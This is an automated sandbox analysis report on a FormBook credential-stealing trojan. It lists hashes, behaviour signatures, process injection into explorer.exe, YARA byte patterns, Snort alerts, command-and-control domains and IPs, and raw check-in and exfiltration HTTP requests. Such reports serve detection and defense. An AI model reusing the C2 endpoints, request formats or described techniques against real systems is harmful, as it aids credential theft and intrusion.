Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Analysis ID:830750
MD5:c7714b273571ba64c0b77afca236ac6d
SHA1:c24d9460bee8a724abe8b0dcf3d74851dd5737ed
SHA256:e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe (PID: 5020 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe MD5: C7714B273571BA64C0B77AFCA236AC6D)
    • vfpbkeeo.exe (PID: 1316 cmdline: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m MD5: 6D30D26416D626447BA4298A59111F6D)
      • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • vfpbkeeo.exe (PID: 1948 cmdline: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe MD5: 6D30D26416D626447BA4298A59111F6D)
        • explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 916 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x180f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17b91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x181f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1836f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de87:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.vfpbkeeo.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.vfpbkeeo.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1931a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.vfpbkeeo.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x19118:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18bb4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1921a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19392:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1eeaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fe5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.vfpbkeeo.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.vfpbkeeo.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.491.195.240.9449702802031449 03/20/23-17:00:09.343542
          SID:2031449
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031412 03/20/23-17:00:25.955923
          SID:2031412
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031453 03/20/23-17:00:25.955923
          SID:2031453
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031453 03/20/23-16:59:46.201874
          SID:2031453
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.491.195.240.9449702802031453 03/20/23-17:00:09.343542
          SID:2031453
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031412 03/20/23-16:59:46.201874
          SID:2031412
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.491.195.240.9449702802031412 03/20/23-17:00:09.343542
          SID:2031412
          Source Port:49702
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.494.176.104.8649696802031449 03/20/23-16:59:46.201874
          SID:2031449
          Source Port:49696
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.481.17.18.19849706802031449 03/20/23-17:00:25.955923
          SID:2031449
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeReversingLabs: Detection: 42%
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeVirustotal: Detection: 42%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw==Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.comAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/www.gritslab.comAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.ukAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/www.white-hat.ukAvira URL Cloud: Label: malware
          Source: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lAvira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ==Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg==Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.comAvira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/www.222ambking.orgAvira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cAvira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ==Avira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/www.un-object.comAvira URL Cloud: Label: malware
          Source: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfrAvira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.comAvira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shopAvira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw==Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/www.germanreps.comAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/www.younrock.comAvira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3RAvira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyzAvira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.comAvira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.comAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeReversingLabs: Detection: 38%
          Machine Learning detection for sample
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeJoe Sandbox ML: detected
          Source: 3.2.vfpbkeeo.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.vfpbkeeo.exe.2080000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_004089B8 FindFirstFileExW,1_2_004089B8

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 85.187.128.34 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.94 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 45.33.30.197 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.un-object.com
          Source: C:\Windows\explorer.exeDomain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exeNetwork Connect: 78.141.192.145 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.white-hat.uk
          Source: C:\Windows\explorer.exeDomain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.18.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.185.17.12 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.younrock.com
          Source: C:\Windows\explorer.exeDomain query: www.gritslab.com
          Source: C:\Windows\explorer.exeNetwork Connect: 161.97.163.8 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.222ambking.org
          Source: C:\Windows\explorer.exeDomain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exeNetwork Connect: 94.176.104.86 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 213.145.228.111 80Jump to behavior
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.shapshit.xyz
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 85.187.128.34 85.187.128.34
          Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
